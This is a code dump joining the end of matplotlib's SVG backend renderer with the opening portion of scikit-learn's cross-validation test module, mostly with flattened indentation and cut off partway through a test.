tpath = transform.transform_path(path)
path_data = []
appender = path_data.append
path_commands = self._path_commands
currpos = 0
for points, code in tpath.iter_segments(simplify):
if code == Path.CLOSEPOLY:
segment = 'z'
else:
segment = path_commands[code] % tuple(points)
if currpos + len(segment) > 75:
appender("\n")
currpos = 0
appender(segment)
currpos += len(segment)
return ''.join(path_data)
def draw_path(self, gc, path, transform, rgbFace=None):
trans_and_flip = self._make_flip_transform(transform)
path_data = self._convert_path(path, trans_and_flip, self.simplify)
self._draw_svg_element('path', 'd="%s"' % path_data, gc, rgbFace)
def draw_markers(self, gc, marker_path, marker_trans, path, trans, rgbFace=None):
write = self._svgwriter.write
key = self._convert_path(marker_path, marker_trans + Affine2D().scale(1.0, -1.0))
name = self._markers.get(key)
if name is None:
name = 'm%s' % md5(key).hexdigest()
write('<defs><path id="%s" d="%s"/></defs>\n' % (name, key))
self._markers[key] = name
clipid = self._get_gc_clip_svg(gc)
if clipid is None:
clippath = ''
else:
clippath = 'clip-path="url(#%s)"' % clipid
write('<g %s>' % clippath)
trans_and_flip = self._make_flip_transform(trans)
tpath = trans_and_flip.transform_path(path)
for vertices, code in tpath.iter_segments():
if len(vertices):
x, y = vertices[-2:]
details = 'xlink:href="#%s" x="%f" y="%f"' % (name, x, y)
style = self._get_style(gc, rgbFace)
self._svgwriter.write ('<use style="%s" %s/>\n' % (style, details))
write('</g>')
def draw_path_collection(self, master_transform, cliprect, clippath,
clippath_trans, paths, all_transforms, offsets,
offsetTrans, facecolors, edgecolors, linewidths,
linestyles, antialiaseds, urls):
write = self._svgwriter.write
path_codes = []
write('<defs>\n')
for i, (path, transform) in enumerate(self._iter_collection_raw_paths(
master_transform, paths, all_transforms)):
transform = Affine2D(transform.get_matrix()).scale(1.0, -1.0)
d = self._convert_path(path, transform)
name = 'coll%x_%x_%s' % (self._path_collection_id, i,
md5(d).hexdigest())
write('<path id="%s" d="%s"/>\n' % (name, d))
path_codes.append(name)
write('</defs>\n')
for xo, yo, path_id, gc, rgbFace in self._iter_collection(
path_codes, cliprect, clippath, clippath_trans,
offsets, offsetTrans, facecolors, edgecolors,
linewidths, linestyles, antialiaseds, urls):
clipid = self._get_gc_clip_svg(gc)
url = gc.get_url()
if url is not None:
self._svgwriter.write('<a xlink:href="%s">' % url)
if clipid is not None:
write('<g clip-path="url(#%s)">' % clipid)
details = 'xlink:href="#%s" x="%f" y="%f"' % (path_id, xo, self.height - yo)
style = self._get_style(gc, rgbFace)
self._svgwriter.write ('<use style="%s" %s/>\n' % (style, details))
if clipid is not None:
write('</g>')
if url is not None:
self._svgwriter.write('</a>')
self._path_collection_id += 1
def draw_image(self, x, y, im, bbox, clippath=None, clippath_trans=None):
# MGDTODO: Support clippath here
trans = [1,0,0,1,0,0]
transstr = ''
if rcParams['svg.image_noscale']:
trans = list(im.get_matrix())
trans[5] = -trans[5]
transstr = 'transform="matrix(%f %f %f %f %f %f)" '%tuple(trans)
assert trans[1] == 0
assert trans[2] == 0
numrows,numcols = im.get_size()
im.reset_matrix()
im.set_interpolation(0)
im.resize(numcols, numrows)
h,w = im.get_size_out()
url = getattr(im, '_url', None)
if url is not None:
self._svgwriter.write('<a xlink:href="%s">' % url)
self._svgwriter.write (
'<image x="%f" y="%f" width="%f" height="%f" '
'%s xlink:href="'%(x/trans[0], (self.height-y)/trans[3]-h, w, h, transstr)
)
if rcParams['svg.image_inline']:
self._svgwriter.write("data:image/png;base64,\n")
stringio = cStringIO.StringIO()
im.flipud_out()
rows, cols, buffer = im.as_rgba_str()
_png.write_png(buffer, cols, rows, stringio)
im.flipud_out()
self._svgwriter.write(base64.encodestring(stringio.getvalue()))
else:
self._imaged[self.basename] = self._imaged.get(self.basename,0) + 1
filename = '%s.image%d.png'%(self.basename, self._imaged[self.basename])
verbose.report( 'Writing image file for inclusion: %s' % filename)
im.flipud_out()
rows, cols, buffer = im.as_rgba_str()
_png.write_png(buffer, cols, rows, filename)
im.flipud_out()
self._svgwriter.write(filename)
self._svgwriter.write('"/>\n')
if url is not None:
self._svgwriter.write('</a>')
def draw_text(self, gc, x, y, s, prop, angle, ismath):
if ismath:
self._draw_mathtext(gc, x, y, s, prop, angle)
return
font = self._get_font(prop)
font.set_text(s, 0.0, flags=LOAD_NO_HINTING)
y -= font.get_descent() / 64.0
fontsize = prop.get_size_in_points()
color = rgb2hex(gc.get_rgb()[:3])
write = self._svgwriter.write
if rcParams['svg.embed_char_paths']:
new_chars = []
for c in s:
path = self._add_char_def(prop, c)
if path is not None:
new_chars.append(path)
if len(new_chars):
write('<defs>\n')
for path in new_chars:
write(path)
write('</defs>\n')
svg = []
clipid = self._get_gc_clip_svg(gc)
if clipid is not None:
svg.append('<g clip-path="url(#%s)">\n' % clipid)
svg.append('<g style="fill: %s; opacity: %f" transform="' % (color, gc.get_alpha()))
if angle != 0:
svg.append('translate(%f,%f)rotate(%1.1f)' % (x,y,-angle))
elif x != 0 or y != 0:
svg.append('translate(%f,%f)' % (x, y))
svg.append('scale(%f)">\n' % (fontsize / self.FONT_SCALE))
cmap = font.get_charmap()
lastgind = None
currx = 0
for c in s:
charnum = self._get_char_def_id(prop, c)
ccode = ord(c)
gind = cmap.get(ccode)
if gind is None:
ccode = ord('?')
gind = 0
glyph = font.load_char(ccode, flags=LOAD_NO_HINTING)
if lastgind is not None:
kern = font.get_kerning(lastgind, gind, KERNING_DEFAULT)
else:
kern = 0
currx += (kern / 64.0) / (self.FONT_SCALE / fontsize)
svg.append('<use xlink:href="#%s"' % charnum)
if currx != 0:
svg.append(' x="%f"' %
(currx * (self.FONT_SCALE / fontsize)))
svg.append('/>\n')
currx += (glyph.linearHoriAdvance / 65536.0) / (self.FONT_SCALE / fontsize)
lastgind = gind
svg.append('</g>\n')
if clipid is not None:
svg.append('</g>\n')
svg = ''.join(svg)
else:
thetext = escape_xml_text(s)
fontfamily = font.family_name
fontstyle = prop.get_style()
style = ('font-size: %f; font-family: %s; font-style: %s; fill: %s; opacity: %f' %
(fontsize, fontfamily,fontstyle, color, gc.get_alpha()))
if angle!=0:
transform = 'transform="translate(%f,%f) rotate(%1.1f) translate(%f,%f)"' % (x,y,-angle,-x,-y)
# Inkscape doesn't support rotate(angle x y)
else:
transform = ''
svg = """\
<text style="%(style)s" x="%(x)f" y="%(y)f" %(transform)s>%(thetext)s</text>
""" % locals()
write(svg)
def _add_char_def(self, prop, char):
if isinstance(prop, FontProperties):
newprop = prop.copy()
font = self._get_font(newprop)
else:
font = prop
font.set_size(self.FONT_SCALE, 72)
ps_name = font.get_sfnt()[(1,0,0,6)]
char_id = urllib.quote('%s-%d' % (ps_name, ord(char)))
char_num = self._char_defs.get(char_id, None)
if char_num is not None:
return None
path_data = []
glyph = font.load_char(ord(char), flags=LOAD_NO_HINTING)
currx, curry = 0.0, 0.0
for step in glyph.path:
if step[0] == 0: # MOVE_TO
path_data.append("M%f %f" %
(step[1], -step[2]))
elif step[0] == 1: # LINE_TO
path_data.append("l%f %f" %
(step[1] - currx, -step[2] - curry))
elif step[0] == 2: # CURVE3
path_data.append("q%f %f %f %f" %
(step[1] - currx, -step[2] - curry,
step[3] - currx, -step[4] - curry))
elif step[0] == 3: # CURVE4
path_data.append("c%f %f %f %f %f %f" %
(step[1] - currx, -step[2] - curry,
step[3] - currx, -step[4] - curry,
step[5] - currx, -step[6] - curry))
elif step[0] == 4: # ENDPOLY
path_data.append("z")
currx, curry = 0.0, 0.0
if step[0] != 4:
currx, curry = step[-2], -step[-1]
path_data = ''.join(path_data)
char_num = 'c_%s' % md5(path_data).hexdigest()
path_element = '<path id="%s" d="%s"/>\n' % (char_num, ''.join(path_data))
self._char_defs[char_id] = char_num
return path_element
def _get_char_def_id(self, prop, char):
if isinstance(prop, FontProperties):
newprop = prop.copy()
font = self._get_font(newprop)
else:
font = prop
font.set_size(self.FONT_SCALE, 72)
ps_name = font.get_sfnt()[(1,0,0,6)]
char_id = urllib.quote('%s-%d' % (ps_name, ord(char)))
return self._char_defs[char_id]
def _draw_mathtext(self, gc, x, y, s, prop, angle):
"""
Draw math text using matplotlib.mathtext
"""
width, height, descent, svg_elements, used_characters = \
self.mathtext_parser.parse(s, 72, prop)
svg_glyphs = svg_elements.svg_glyphs
svg_rects = svg_elements.svg_rects
color = rgb2hex(gc.get_rgb()[:3])
write = self._svgwriter.write
style = "fill: %s" % color
if rcParams['svg.embed_char_paths']:
new_chars = []
for font, fontsize, thetext, new_x, new_y_mtc, metrics in svg_glyphs:
path = self._add_char_def(font, thetext)
if path is not None:
new_chars.append(path)
if len(new_chars):
write('<defs>\n')
for path in new_chars:
write(path)
write('</defs>\n')
svg = ['<g style="%s" transform="' % style]
if angle != 0:
svg.append('translate(%f,%f)rotate(%1.1f)'
% (x,y,-angle) )
else:
svg.append('translate(%f,%f)' % (x, y))
svg.append('">\n')
for font, fontsize, thetext, new_x, new_y_mtc, metrics in svg_glyphs:
charid = self._get_char_def_id(font, thetext)
svg.append('<use xlink:href="#%s" transform="translate(%f,%f)scale(%f)"/>\n' %
(charid, new_x, -new_y_mtc, fontsize / self.FONT_SCALE))
svg.append('</g>\n')
else: # not rcParams['svg.embed_char_paths']
svg = ['<text style="%s" x="%f" y="%f"' % (style, x, y)]
if angle != 0:
svg.append(' transform="translate(%f,%f) rotate(%1.1f) translate(%f,%f)"'
% (x,y,-angle,-x,-y) ) # Inkscape doesn't support rotate(angle x y)
svg.append('>\n')
curr_x,curr_y = 0.0,0.0
for font, fontsize, thetext, new_x, new_y_mtc, metrics in svg_glyphs:
new_y = - new_y_mtc
style = "font-size: %f; font-family: %s" % (fontsize, font.family_name)
svg.append('<tspan style="%s"' % style)
xadvance = metrics.advance
svg.append(' textLength="%f"' % xadvance)
dx = new_x - curr_x
if dx != 0.0:
svg.append(' dx="%f"' % dx)
dy = new_y - curr_y
if dy != 0.0:
svg.append(' dy="%f"' % dy)
thetext = escape_xml_text(thetext)
svg.append('>%s</tspan>\n' % thetext)
curr_x = new_x + xadvance
curr_y = new_y
svg.append('</text>\n')
if len(svg_rects):
style = "fill: %s; stroke: none" % color
svg.append('<g style="%s" transform="' % style)
if angle != 0:
svg.append('translate(%f,%f) rotate(%1.1f)'
% (x,y,-angle) )
else:
svg.append('translate(%f,%f)' % (x, y))
svg.append('">\n')
for x, y, width, height in svg_rects:
svg.append('<rect x="%f" y="%f" width="%f" height="%f" fill="black" stroke="none" />' % (x, -y + height, width, height))
svg.append("</g>")
self.open_group("mathtext")
write (''.join(svg))
self.close_group("mathtext")
def finalize(self):
write = self._svgwriter.write
write('</svg>\n')
def flipy(self):
return True
def get_canvas_width_height(self):
return self.width, self.height
def get_text_width_height_descent(self, s, prop, ismath):
if ismath:
width, height, descent, trash, used_characters = \
self.mathtext_parser.parse(s, 72, prop)
return width, height, descent
font = self._get_font(prop)
font.set_text(s, 0.0, flags=LOAD_NO_HINTING)
w, h = font.get_width_height()
w /= 64.0 # convert from subpixels
h /= 64.0
d = font.get_descent()
d /= 64.0
return w, h, d
class FigureCanvasSVG(FigureCanvasBase):
filetypes = {'svg': 'Scalable Vector Graphics',
'svgz': 'Scalable Vector Graphics'}
def print_svg(self, filename, *args, **kwargs):
if is_string_like(filename):
fh_to_close = svgwriter = codecs.open(filename, 'w', 'utf-8')
elif is_writable_file_like(filename):
svgwriter = codecs.EncodedFile(filename, 'utf-8')
fh_to_close = None
else:
raise ValueError("filename must be a path or a file-like object")
return self._print_svg(filename, svgwriter, fh_to_close)
def print_svgz(self, filename, *args, **kwargs):
if is_string_like(filename):
gzipwriter = gzip.GzipFile(filename, 'w')
fh_to_close = svgwriter = codecs.EncodedFile(gzipwriter, 'utf-8')
elif is_writable_file_like(filename):
fh_to_close = gzipwriter = gzip.GzipFile(fileobj=filename, mode='w')
svgwriter = codecs.EncodedFile(gzipwriter, 'utf-8')
else:
raise ValueError("filename must be a path or a file-like object")
return self._print_svg(filename, svgwriter, fh_to_close)
def _print_svg(self, filename, svgwriter, fh_to_close=None):
self.figure.set_dpi(72.0)
width, height = self.figure.get_size_inches()
w, h = width*72, height*72
if rcParams['svg.image_noscale']:
renderer = RendererSVG(w, h, svgwriter, filename)
else:
renderer = MixedModeRenderer(
width, height, 72.0, RendererSVG(w, h, svgwriter, filename))
self.figure.draw(renderer)
renderer.finalize()
if fh_to_close is not None:
svgwriter.close()
def get_default_filetype(self):
return 'svg'
class FigureManagerSVG(FigureManagerBase):
pass
FigureManager = FigureManagerSVG
svgProlog = """\
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN"
"http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<!-- Created with matplotlib (http://matplotlib.sourceforge.net/) -->
<svg width="%ipt" height="%ipt" viewBox="0 0 %i %i"
xmlns="http://www.w3.org/2000/svg"
xmlns:xlink="http://www.w3.org/1999/xlink"
version="1.1"
id="svg1">
"""
| agpl-3.0 |
mbayon/TFG-MachineLearning | vbig/lib/python2.7/site-packages/sklearn/model_selection/tests/test_validation.py | 6 | 57672 | """Test the validation module"""
from __future__ import division
import sys
import warnings
import tempfile
import os
from time import sleep
import numpy as np
from scipy.sparse import coo_matrix, csr_matrix
from sklearn.utils.testing import assert_true
from sklearn.utils.testing import assert_false
from sklearn.utils.testing import assert_equal
from sklearn.utils.testing import assert_almost_equal
from sklearn.utils.testing import assert_raises
from sklearn.utils.testing import assert_raise_message
from sklearn.utils.testing import assert_warns
from sklearn.utils.testing import assert_warns_message
from sklearn.utils.testing import assert_no_warnings
from sklearn.utils.testing import assert_raises_regex
from sklearn.utils.testing import assert_greater
from sklearn.utils.testing import assert_less
from sklearn.utils.testing import assert_array_almost_equal
from sklearn.utils.testing import assert_array_equal
from sklearn.utils.mocking import CheckingClassifier, MockDataFrame
from sklearn.model_selection import cross_val_score
from sklearn.model_selection import cross_val_predict
from sklearn.model_selection import cross_validate
from sklearn.model_selection import permutation_test_score
from sklearn.model_selection import KFold
from sklearn.model_selection import StratifiedKFold
from sklearn.model_selection import LeaveOneOut
from sklearn.model_selection import LeaveOneGroupOut
from sklearn.model_selection import LeavePGroupsOut
from sklearn.model_selection import GroupKFold
from sklearn.model_selection import GroupShuffleSplit
from sklearn.model_selection import learning_curve
from sklearn.model_selection import validation_curve
from sklearn.model_selection._validation import _check_is_permutation
from sklearn.datasets import make_regression
from sklearn.datasets import load_boston
from sklearn.datasets import load_iris
from sklearn.datasets import load_digits
from sklearn.metrics import explained_variance_score
from sklearn.metrics import make_scorer
from sklearn.metrics import accuracy_score
from sklearn.metrics import confusion_matrix
from sklearn.metrics import precision_recall_fscore_support
from sklearn.metrics import precision_score
from sklearn.metrics import r2_score
from sklearn.metrics.scorer import check_scoring
from sklearn.linear_model import Ridge, LogisticRegression, SGDClassifier
from sklearn.linear_model import PassiveAggressiveClassifier, RidgeClassifier
from sklearn.neighbors import KNeighborsClassifier
from sklearn.svm import SVC
from sklearn.cluster import KMeans
from sklearn.preprocessing import Imputer
from sklearn.preprocessing import LabelEncoder
from sklearn.pipeline import Pipeline
from sklearn.externals.six.moves import cStringIO as StringIO
from sklearn.base import BaseEstimator
from sklearn.base import clone
from sklearn.multiclass import OneVsRestClassifier
from sklearn.utils import shuffle
from sklearn.datasets import make_classification
from sklearn.datasets import make_multilabel_classification
from sklearn.model_selection.tests.common import OneTimeSplitter
from sklearn.model_selection import GridSearchCV
try:
WindowsError
except NameError:
WindowsError = None
class MockImprovingEstimator(BaseEstimator):
"""Dummy classifier to test the learning curve"""
def __init__(self, n_max_train_sizes):
self.n_max_train_sizes = n_max_train_sizes
self.train_sizes = 0
self.X_subset = None
def fit(self, X_subset, y_subset=None):
self.X_subset = X_subset
self.train_sizes = X_subset.shape[0]
return self
def predict(self, X):
raise NotImplementedError
def score(self, X=None, Y=None):
# training score becomes worse (2 -> 1), test error better (0 -> 1)
if self._is_training_data(X):
return 2. - float(self.train_sizes) / self.n_max_train_sizes
else:
return float(self.train_sizes) / self.n_max_train_sizes
def _is_training_data(self, X):
return X is self.X_subset
class MockIncrementalImprovingEstimator(MockImprovingEstimator):
"""Dummy classifier that provides partial_fit"""
def __init__(self, n_max_train_sizes):
super(MockIncrementalImprovingEstimator,
self).__init__(n_max_train_sizes)
self.x = None
def _is_training_data(self, X):
return self.x in X
def partial_fit(self, X, y=None, **params):
self.train_sizes += X.shape[0]
self.x = X[0]
class MockEstimatorWithParameter(BaseEstimator):
"""Dummy classifier to test the validation curve"""
def __init__(self, param=0.5):
self.X_subset = None
self.param = param
def fit(self, X_subset, y_subset):
self.X_subset = X_subset
self.train_sizes = X_subset.shape[0]
return self
def predict(self, X):
raise NotImplementedError
def score(self, X=None, y=None):
return self.param if self._is_training_data(X) else 1 - self.param
def _is_training_data(self, X):
return X is self.X_subset
class MockEstimatorWithSingleFitCallAllowed(MockEstimatorWithParameter):
"""Dummy classifier that disallows repeated calls of fit method"""
def fit(self, X_subset, y_subset):
assert_false(
hasattr(self, 'fit_called_'),
'fit is called the second time'
)
self.fit_called_ = True
return super(type(self), self).fit(X_subset, y_subset)
def predict(self, X):
raise NotImplementedError
class MockClassifier(object):
"""Dummy classifier to test the cross-validation"""
def __init__(self, a=0, allow_nd=False):
self.a = a
self.allow_nd = allow_nd
def fit(self, X, Y=None, sample_weight=None, class_prior=None,
sparse_sample_weight=None, sparse_param=None, dummy_int=None,
dummy_str=None, dummy_obj=None, callback=None):
"""The dummy arguments are to test that this fit function can
accept non-array arguments through cross-validation, such as:
- int
- str (this is actually array-like)
- object
- function
"""
self.dummy_int = dummy_int
self.dummy_str = dummy_str
self.dummy_obj = dummy_obj
if callback is not None:
callback(self)
if self.allow_nd:
X = X.reshape(len(X), -1)
if X.ndim >= 3 and not self.allow_nd:
raise ValueError('X cannot be d')
if sample_weight is not None:
assert_true(sample_weight.shape[0] == X.shape[0],
'MockClassifier extra fit_param sample_weight.shape[0]'
' is {0}, should be {1}'.format(sample_weight.shape[0],
X.shape[0]))
if class_prior is not None:
assert_true(class_prior.shape[0] == len(np.unique(y)),
'MockClassifier extra fit_param class_prior.shape[0]'
' is {0}, should be {1}'.format(class_prior.shape[0],
len(np.unique(y))))
if sparse_sample_weight is not None:
fmt = ('MockClassifier extra fit_param sparse_sample_weight'
'.shape[0] is {0}, should be {1}')
assert_true(sparse_sample_weight.shape[0] == X.shape[0],
fmt.format(sparse_sample_weight.shape[0], X.shape[0]))
if sparse_param is not None:
fmt = ('MockClassifier extra fit_param sparse_param.shape '
'is ({0}, {1}), should be ({2}, {3})')
assert_true(sparse_param.shape == P_sparse.shape,
fmt.format(sparse_param.shape[0],
sparse_param.shape[1],
P_sparse.shape[0], P_sparse.shape[1]))
return self
def predict(self, T):
if self.allow_nd:
T = T.reshape(len(T), -1)
return T[:, 0]
def score(self, X=None, Y=None):
return 1. / (1 + np.abs(self.a))
def get_params(self, deep=False):
return {'a': self.a, 'allow_nd': self.allow_nd}
# XXX: use 2D array, since 1D X is being detected as a single sample in
# check_consistent_length
X = np.ones((10, 2))
X_sparse = coo_matrix(X)
y = np.array([0, 0, 1, 1, 2, 2, 3, 3, 4, 4])
# The number of samples per class needs to be > n_splits,
# for StratifiedKFold(n_splits=3)
y2 = np.array([1, 1, 1, 2, 2, 2, 3, 3, 3, 3])
P_sparse = coo_matrix(np.eye(5))
def test_cross_val_score():
clf = MockClassifier()
for a in range(-10, 10):
clf.a = a
# Smoke test
scores = cross_val_score(clf, X, y2)
assert_array_equal(scores, clf.score(X, y2))
# test with multioutput y
multioutput_y = np.column_stack([y2, y2[::-1]])
scores = cross_val_score(clf, X_sparse, multioutput_y)
assert_array_equal(scores, clf.score(X_sparse, multioutput_y))
scores = cross_val_score(clf, X_sparse, y2)
assert_array_equal(scores, clf.score(X_sparse, y2))
# test with multioutput y
scores = cross_val_score(clf, X_sparse, multioutput_y)
assert_array_equal(scores, clf.score(X_sparse, multioutput_y))
# test with X and y as list
list_check = lambda x: isinstance(x, list)
clf = CheckingClassifier(check_X=list_check)
scores = cross_val_score(clf, X.tolist(), y2.tolist())
clf = CheckingClassifier(check_y=list_check)
scores = cross_val_score(clf, X, y2.tolist())
assert_raises(ValueError, cross_val_score, clf, X, y2, scoring="sklearn")
# test with 3d X and
X_3d = X[:, :, np.newaxis]
clf = MockClassifier(allow_nd=True)
scores = cross_val_score(clf, X_3d, y2)
clf = MockClassifier(allow_nd=False)
assert_raises(ValueError, cross_val_score, clf, X_3d, y2)
def test_cross_validate_invalid_scoring_param():
X, y = make_classification(random_state=0)
estimator = MockClassifier()
# Test the errors
error_message_regexp = ".*must be unique strings.*"
# List/tuple of callables should raise a message advising users to use
# dict of names to callables mapping
assert_raises_regex(ValueError, error_message_regexp,
cross_validate, estimator, X, y,
scoring=(make_scorer(precision_score),
make_scorer(accuracy_score)))
assert_raises_regex(ValueError, error_message_regexp,
cross_validate, estimator, X, y,
scoring=(make_scorer(precision_score),))
# So should empty lists/tuples
assert_raises_regex(ValueError, error_message_regexp + "Empty list.*",
cross_validate, estimator, X, y, scoring=())
# So should duplicated entries
assert_raises_regex(ValueError, error_message_regexp + "Duplicate.*",
cross_validate, estimator, X, y,
scoring=('f1_micro', 'f1_micro'))
# Nested Lists should raise a generic error message
assert_raises_regex(ValueError, error_message_regexp,
cross_validate, estimator, X, y,
scoring=[[make_scorer(precision_score)]])
error_message_regexp = (".*should either be.*string or callable.*for "
"single.*.*dict.*for multi.*")
# Empty dict should raise invalid scoring error
assert_raises_regex(ValueError, "An empty dict",
cross_validate, estimator, X, y, scoring=(dict()))
# And so should any other invalid entry
assert_raises_regex(ValueError, error_message_regexp,
cross_validate, estimator, X, y, scoring=5)
multiclass_scorer = make_scorer(precision_recall_fscore_support)
# Multiclass Scorers that return multiple values are not supported yet
assert_raises_regex(ValueError,
"Classification metrics can't handle a mix of "
"binary and continuous targets",
cross_validate, estimator, X, y,
scoring=multiclass_scorer)
assert_raises_regex(ValueError,
"Classification metrics can't handle a mix of "
"binary and continuous targets",
cross_validate, estimator, X, y,
scoring={"foo": multiclass_scorer})
multivalued_scorer = make_scorer(confusion_matrix)
# Multiclass Scorers that return multiple values are not supported yet
assert_raises_regex(ValueError, "scoring must return a number, got",
cross_validate, SVC(), X, y,
scoring=multivalued_scorer)
assert_raises_regex(ValueError, "scoring must return a number, got",
cross_validate, SVC(), X, y,
scoring={"foo": multivalued_scorer})
assert_raises_regex(ValueError, "'mse' is not a valid scoring value.",
cross_validate, SVC(), X, y, scoring="mse")
def test_cross_validate():
# Compute train and test mse/r2 scores
cv = KFold(n_splits=5)
# Regression
X_reg, y_reg = make_regression(n_samples=30, random_state=0)
reg = Ridge(random_state=0)
# Classification
X_clf, y_clf = make_classification(n_samples=30, random_state=0)
clf = SVC(kernel="linear", random_state=0)
for X, y, est in ((X_reg, y_reg, reg), (X_clf, y_clf, clf)):
# It's okay to evaluate regression metrics on classification too
mse_scorer = check_scoring(est, 'neg_mean_squared_error')
r2_scorer = check_scoring(est, 'r2')
train_mse_scores = []
test_mse_scores = []
train_r2_scores = []
test_r2_scores = []
for train, test in cv.split(X, y):
est = clone(reg).fit(X[train], y[train])
train_mse_scores.append(mse_scorer(est, X[train], y[train]))
train_r2_scores.append(r2_scorer(est, X[train], y[train]))
test_mse_scores.append(mse_scorer(est, X[test], y[test]))
test_r2_scores.append(r2_scorer(est, X[test], y[test]))
train_mse_scores = np.array(train_mse_scores)
test_mse_scores = np.array(test_mse_scores)
train_r2_scores = np.array(train_r2_scores)
test_r2_scores = np.array(test_r2_scores)
scores = (train_mse_scores, test_mse_scores, train_r2_scores,
test_r2_scores)
yield check_cross_validate_single_metric, est, X, y, scores
yield check_cross_validate_multi_metric, est, X, y, scores
def test_cross_validate_return_train_score_warn():
# Test that warnings are raised. Will be removed in 0.21
X, y = make_classification(random_state=0)
estimator = MockClassifier()
result = {}
for val in [False, True, 'warn']:
result[val] = assert_no_warnings(cross_validate, estimator, X, y,
return_train_score=val)
msg = (
'You are accessing a training score ({!r}), '
'which will not be available by default '
'any more in 0.21. If you need training scores, '
'please set return_train_score=True').format('train_score')
train_score = assert_warns_message(FutureWarning, msg,
result['warn'].get, 'train_score')
assert np.allclose(train_score, result[True]['train_score'])
assert 'train_score' not in result[False]
def check_cross_validate_single_metric(clf, X, y, scores):
(train_mse_scores, test_mse_scores, train_r2_scores,
test_r2_scores) = scores
# Test single metric evaluation when scoring is string or singleton list
for (return_train_score, dict_len) in ((True, 4), (False, 3)):
# Single metric passed as a string
if return_train_score:
# It must be True by default
mse_scores_dict = cross_validate(clf, X, y, cv=5,
scoring='neg_mean_squared_error')
assert_array_almost_equal(mse_scores_dict['train_score'],
train_mse_scores)
else:
mse_scores_dict = cross_validate(clf, X, y, cv=5,
scoring='neg_mean_squared_error',
return_train_score=False)
assert_true(isinstance(mse_scores_dict, dict))
assert_equal(len(mse_scores_dict), dict_len)
assert_array_almost_equal(mse_scores_dict['test_score'],
test_mse_scores)
# Single metric passed as a list
if return_train_score:
# It must be True by default
r2_scores_dict = cross_validate(clf, X, y, cv=5, scoring=['r2'])
assert_array_almost_equal(r2_scores_dict['train_r2'],
train_r2_scores)
else:
r2_scores_dict = cross_validate(clf, X, y, cv=5, scoring=['r2'],
return_train_score=False)
assert_true(isinstance(r2_scores_dict, dict))
assert_equal(len(r2_scores_dict), dict_len)
assert_array_almost_equal(r2_scores_dict['test_r2'], test_r2_scores)
def check_cross_validate_multi_metric(clf, X, y, scores):
# Test multimetric evaluation when scoring is a list / dict
(train_mse_scores, test_mse_scores, train_r2_scores,
test_r2_scores) = scores
all_scoring = (('r2', 'neg_mean_squared_error'),
{'r2': make_scorer(r2_score),
'neg_mean_squared_error': 'neg_mean_squared_error'})
keys_sans_train = set(('test_r2', 'test_neg_mean_squared_error',
'fit_time', 'score_time'))
keys_with_train = keys_sans_train.union(
set(('train_r2', 'train_neg_mean_squared_error')))
for return_train_score in (True, False):
for scoring in all_scoring:
if return_train_score:
# return_train_score must be True by default
cv_results = cross_validate(clf, X, y, cv=5, scoring=scoring)
assert_array_almost_equal(cv_results['train_r2'],
train_r2_scores)
assert_array_almost_equal(
cv_results['train_neg_mean_squared_error'],
train_mse_scores)
else:
cv_results = cross_validate(clf, X, y, cv=5, scoring=scoring,
return_train_score=False)
assert_true(isinstance(cv_results, dict))
assert_equal(set(cv_results.keys()),
keys_with_train if return_train_score
else keys_sans_train)
assert_array_almost_equal(cv_results['test_r2'], test_r2_scores)
assert_array_almost_equal(
cv_results['test_neg_mean_squared_error'], test_mse_scores)
# Make sure all the arrays are of np.ndarray type
assert type(cv_results['test_r2']) == np.ndarray
assert (type(cv_results['test_neg_mean_squared_error']) ==
np.ndarray)
assert type(cv_results['fit_time']) == np.ndarray
assert type(cv_results['score_time']) == np.ndarray
# Ensure all the times are within sane limits
assert np.all(cv_results['fit_time'] >= 0)
assert np.all(cv_results['fit_time'] < 10)
assert np.all(cv_results['score_time'] >= 0)
assert np.all(cv_results['score_time'] < 10)
def test_cross_val_score_predict_groups():
# Check if ValueError (when groups is None) propagates to cross_val_score
# and cross_val_predict
# And also check if groups is correctly passed to the cv object
X, y = make_classification(n_samples=20, n_classes=2, random_state=0)
clf = SVC(kernel="linear")
group_cvs = [LeaveOneGroupOut(), LeavePGroupsOut(2), GroupKFold(),
GroupShuffleSplit()]
for cv in group_cvs:
assert_raise_message(ValueError,
"The 'groups' parameter should not be None.",
cross_val_score, estimator=clf, X=X, y=y, cv=cv)
assert_raise_message(ValueError,
"The 'groups' parameter should not be None.",
cross_val_predict, estimator=clf, X=X, y=y, cv=cv)
def test_cross_val_score_pandas():
    # check cross_val_score doesn't destroy pandas dataframe
    # Always exercise the MockDataFrame stand-in; additionally use real
    # pandas Series/DataFrame when pandas is importable.
    types = [(MockDataFrame, MockDataFrame)]
    try:
        from pandas import Series, DataFrame
        types.append((Series, DataFrame))
    except ImportError:
        pass
    for TargetType, InputFeatureType in types:
        # X dataframe, y series
        # 3 fold cross val is used so we need atleast 3 samples per class
        X_df, y_ser = InputFeatureType(X), TargetType(y2)
        check_df = lambda x: isinstance(x, InputFeatureType)
        check_series = lambda x: isinstance(x, TargetType)
        # CheckingClassifier asserts during fit that the inputs it receives
        # are still of the original (pandas-like) types.
        clf = CheckingClassifier(check_X=check_df, check_y=check_series)
        cross_val_score(clf, X_df, y_ser)
def test_cross_val_score_mask():
    # test that cross_val_score works with boolean masks
    svm = SVC(kernel="linear")
    iris = load_iris()
    X, y = iris.data, iris.target
    kfold = KFold(5)
    scores_indices = cross_val_score(svm, X, y, cv=kfold)
    kfold = KFold(5)
    cv_masks = []
    for train, test in kfold.split(X, y):
        # Convert the index arrays into boolean masks.  The builtin `bool`
        # is used instead of the deprecated `np.bool` alias (removed in
        # NumPy 1.24).
        mask_train = np.zeros(len(y), dtype=bool)
        mask_test = np.zeros(len(y), dtype=bool)
        mask_train[train] = 1
        mask_test[test] = 1
        # BUG FIX: the index arrays (train, test) were previously appended,
        # so the boolean masks were built but never actually exercised and
        # the test trivially compared indices against themselves.
        cv_masks.append((mask_train, mask_test))
    scores_masks = cross_val_score(svm, X, y, cv=cv_masks)
    # Scores from index-based and mask-based CV splits must be identical.
    assert_array_equal(scores_indices, scores_masks)
def test_cross_val_score_precomputed():
    # test for svm with precomputed kernel
    svm = SVC(kernel="precomputed")
    iris = load_iris()
    X, y = iris.data, iris.target
    linear_kernel = np.dot(X, X.T)  # Gram matrix of the linear kernel
    score_precomputed = cross_val_score(svm, linear_kernel, y)
    svm = SVC(kernel="linear")
    score_linear = cross_val_score(svm, X, y)
    # A precomputed Gram matrix must give the same scores as kernel="linear".
    assert_array_almost_equal(score_precomputed, score_linear)
    # test with callable
